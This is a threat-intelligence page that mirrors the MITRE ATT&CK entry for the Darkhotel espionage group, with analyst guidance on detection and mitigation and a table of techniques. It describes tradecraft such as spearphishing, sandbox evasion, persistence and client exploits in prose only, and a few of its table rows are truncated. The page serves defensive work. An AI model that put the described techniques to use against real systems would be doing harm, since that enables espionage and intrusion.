G0012: Darkhotel
Darkhotel is a suspected South Korean threat group that has targeted victims primarily in East Asia since at least 2004. The group's name is based on cyber espionage operations conducted via hotel Internet networks against traveling executives and other select guests. Darkhotel has also conducted spearphishing campaigns and infected victims through peer-to-peer and file sharing networks.[1][2][3]
Analyst context for executives and security teams
Darkhotel matters because ATT&CK describes it as a long-running espionage-focused group associated with targeting traveling executives through hotel Internet networks, as well as spearphishing and peer-to-peer/file-sharing infection paths. For leadership, the decision value is not the name alone; it is whether high-value users, travel workflows, shared content, and endpoint controls are resilient when attacks begin outside the normal corporate perimeter.
Executive priority
Prioritize this as a test of executive protection, user-targeted intrusion readiness, and evidence quality. Ask whether the organization can protect and investigate traveling executives, detect malicious attachments or drive-by compromise, validate code-signing trust decisions, and respond when credentials or sensitive files may have been collected. Because MITRE provides no official detection text for this group, confidence should come from local telemetry, control validation, and incident response exercises rather than assumed coverage.
Technical view
SOC and IR teams should map coverage to the related ATT&CK techniques: initial access through drive-by compromise, malicious files, spearphishing attachments, removable media, and tainted shared content; execution through client exploitation and Windows command shell; discovery of system, network, process, file, time, and security software details; stealth through encoded files, masqueraded resource names, sandbox evasion, deobfuscation, and code signing; persistence through Windows Run keys/startup folders; collection through keylogging; and command-and-control/tool transfer using encrypted traffic and ingress tool transfer. Validate detections as behavior chains, not single indicators, because the supplied ATT&CK object has no official detection guidance.
Likely telemetry
- Email security and attachment detonation results for targeted spearphishing attachments
- Endpoint process creation, command-line, parent-child process, and script or shell execution logs
- File creation, modification, rename, and directory enumeration telemetry, including shared locations
- Windows Registry Run key and Startup Folder change events where Windows is in scope
- Browser, web proxy, DNS, and network session logs relevant to drive-by compromise and external tool transfer
Detection direction
- Build detections around sequences: initial file/web exposure followed by discovery commands, encoded or renamed payloads, persistence changes, and external file transfer.
- Tune for high-value user context, especially executives and travelers, while avoiding assumptions that every travel network event is malicious.
- Review whether sandbox and malware-analysis workflows account for samples that change behavior based on system checks or user activity checks.
- Validate coverage for signed-but-suspicious binaries; code signing should inform trust decisions, not automatically suppress investigation.
- Monitor shared drives, SaaS shared content, and internal repositories for unexpected executable or script content where Taint Shared Content is relevant.
Mitigation priorities
- Start with protection for high-risk users: hardened endpoints, phishing-resistant processes, safe travel guidance, and rapid reporting paths for suspicious hotel-network or attachment events.
- Maintain disciplined vulnerability and patch management for client applications because related behavior includes exploitation for client execution and drive-by compromise.
- Restrict and monitor execution from user-writable paths, shared content, removable media, and startup locations where business operations allow.
- Apply least privilege and application control principles to reduce the value of keylogging, command shell abuse, persistence, and tool transfer.
- Review code-signing policy so signed binaries are still subject to behavioral inspection and certificate anomalies can be investigated.
Analyst notes and limits
The supplied ATT&CK object identifies aliases Darkhotel, DUBNIUM, and Zigzag Hail, and describes targeting primarily in East Asia since at least 2004, including hotel Internet operations against traveling executives, spearphishing, and peer-to-peer/file-sharing infection. The relationship set is rich enough to guide defensive validation across initial access, execution, discovery, persistence, collection, command and control, and stealth behaviors, but it should be localized to the organization’s actual platforms and telemetry.
The group object lists no platforms, tactics, labels, or official detection text. Related techniques include platform information, but that does not prove every platform is used in every Darkhotel-related intrusion. This take does not claim current activity, customer exposure, attribution certainty beyond MITRE’s wording, or guaranteed detection coverage.
Darkhotel
Darkhotel is a suspected South Korean threat group that has targeted victims primarily in East Asia since at least 2004. The group's name is based on cyber espionage operations conducted via hotel Internet networks against traveling executives and other select guests. Darkhotel has also conducted spearphishing campaigns and infected victims through peer-to-peer and file sharing networks.[1][2][3]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1518.001 | Security Software Discovery Sub-technique | Darkhotel has searched for anti-malware strings and anti-virus processes running on the system.CitationSecurelist Darkhotel Aug 2015CitationMicrosoft DUBNIUM June 2016 |
| Enterprise | T1497.002 | User Activity Based Checks Sub-technique | Darkhotel has used malware that repeatedly checks the mouse cursor position to determine if a real user is on the system.CitationLastline DarkHotel Just In Time Decryption Nov 2015 |
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | Darkhotel has obfuscated code using RC4, XOR, and RSA.CitationSecurelist Darkhotel Aug 2015CitationMicrosoft DUBNIUM July 2016 |
| Enterprise | T1573.001 | Symmetric Cryptography Sub-technique | Darkhotel has used AES-256 and 3DES for C2 communications.CitationMicrosoft DUBNIUM July 2016 |
| Enterprise | T1080 | Taint Shared Content | Darkhotel used a virus that propagates by infecting executables stored on shared drives.CitationKaspersky Darkhotel |
| Enterprise | T1082 | System Information Discovery | Darkhotel has collected the hostname, OS version, service pack version, and the processor architecture from the victim’s machine.CitationSecurelist Darkhotel Aug 2015CitationMicrosoft DUBNIUM July 2016 |
| Enterprise | T1056.001 | Keylogging Sub-technique | Darkhotel has used a keylogger.CitationKaspersky Darkhotel |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | Darkhotel has sent spearphishing emails with malicious RAR and .LNK attachments.CitationSecurelist Darkhotel Aug 2015CitationMicrosoft DUBNIUM July 2016 |
| Enterprise | T1057 | Process Discovery | Darkhotel malware can collect a list of running processes on a system.CitationSecurelist Darkhotel Aug 2015 |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Darkhotel has decrypted strings and imports using RC4 during execution.CitationSecurelist Darkhotel Aug 2015CitationMicrosoft DUBNIUM July 2016 |
| Enterprise | T1189 | Drive-by Compromise | Darkhotel used embedded iframes on hotel login portals to redirect selected victims to download malware.CitationKaspersky Darkhotel |
| Enterprise | T1091 | Replication Through Removable Media | Darkhotel's selective infector modifies executables stored on removable media as a method of spreading across computers.CitationKaspersky Darkhotel |
| Enterprise | T1497 | Virtualization/Sandbox Evasion | Darkhotel malware has employed just-in-time decryption of strings to evade sandbox detection.CitationLastline DarkHotel Just In Time Decryption Nov 2015 |
| Enterprise | T1497.001 | System Checks Sub-technique | Darkhotel malware has used a series of checks to determine if it's being analyzed; checks include the length of executable names, if a filename ends with |
| Enterprise | T1124 | System Time Discovery | Darkhotel malware can obtain system time from a compromised host.CitationLastline DarkHotel Just In Time Decryption Nov 2015 |
| Enterprise | T1553.002 | Code Signing Sub-technique | |
| Enterprise | T1016 | System Network Configuration Discovery | Darkhotel has collected the IP address and network adapter information from the victim’s machine.CitationSecurelist Darkhotel Aug 2015CitationMicrosoft DUBNIUM July 2016 |
| Enterprise | T1083 | File and Directory Discovery | Darkhotel has used malware that searched for files with specific patterns.CitationMicrosoft DUBNIUM July 2016 |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | Darkhotel has dropped an mspaint.lnk shortcut to disk which launches a shell script that downloads and executes a file.CitationSecurelist Darkhotel Aug 2015 |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location Sub-technique | Darkhotel has used malware that is disguised as a Secure Shell (SSH) tool.CitationMicrosoft DUBNIUM June 2016 |
| Enterprise | T1105 | Ingress Tool Transfer | Darkhotel has used first-stage payloads that download additional malware from C2 servers.CitationMicrosoft DUBNIUM June 2016 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | Darkhotel has been known to establish persistence by adding programs to the Run Registry key.CitationKaspersky Darkhotel |
| Enterprise | T1203 | Exploitation for Client Execution | Darkhotel has exploited Adobe Flash vulnerability CVE-2015-8651 for execution.CitationMicrosoft DUBNIUM June 2016 |
| Enterprise | T1204.002 | Malicious File Sub-technique | Darkhotel has sent spearphishing emails in an attempt to lure users into clicking on a malicious attachments.CitationSecurelist Darkhotel Aug 2015CitationMicrosoft DUBNIUM July 2016 |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 3.0 | Current bundle | 520ca8dca182… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Kaspersky Darkhotel
Kaspersky Lab's Global Research and Analysis Team. (2014, November). The Darkhotel APT A Story of Unusual Hospitality. Retrieved November 12, 2014.
Open source URL -
[2]
Securelist Darkhotel Aug 2015
Kaspersky Lab's Global Research & Analysis Team. (2015, August 10). Darkhotel's attacks in 2015. Retrieved November 2, 2018.
Open source URL -
[3]
Microsoft Digital Defense FY20 Sept 2020
Microsoft . (2020, September 29). Microsoft Digital Defense Report FY20. Retrieved April 21, 2021.
Open source URL -
[4]
DUBNIUM
(Citation: Microsoft Digital Defense FY20 Sept 2020)(Citation: Microsoft DUBNIUM June 2016)(Citation: Microsoft DUBNIUM Flash June 2016)(Citation: Microsoft DUBNIUM July 2016)
-
[5]
Darkhotel
(Citation: Kaspersky Darkhotel)
-
[6]
Microsoft DUBNIUM Flash June 2016
Microsoft. (2016, June 20). Reverse-engineering DUBNIUM’s Flash-targeting exploit. Retrieved March 31, 2021.
Open source URL -
[7]
Microsoft DUBNIUM July 2016
Microsoft. (2016, July 14). Reverse engineering DUBNIUM – Stage 2 payload analysis . Retrieved March 31, 2021.
Open source URL -
[8]
Microsoft DUBNIUM June 2016
Microsoft. (2016, June 9). Reverse-engineering DUBNIUM. Retrieved March 31, 2021.
Open source URL -
[9]
Microsoft Threat Actor Naming July 2023
Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
Open source URL -
[10]
Zigzag Hail
(Citation: Microsoft Threat Actor Naming July 2023)
-
[11]
mitre-attack G0012Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.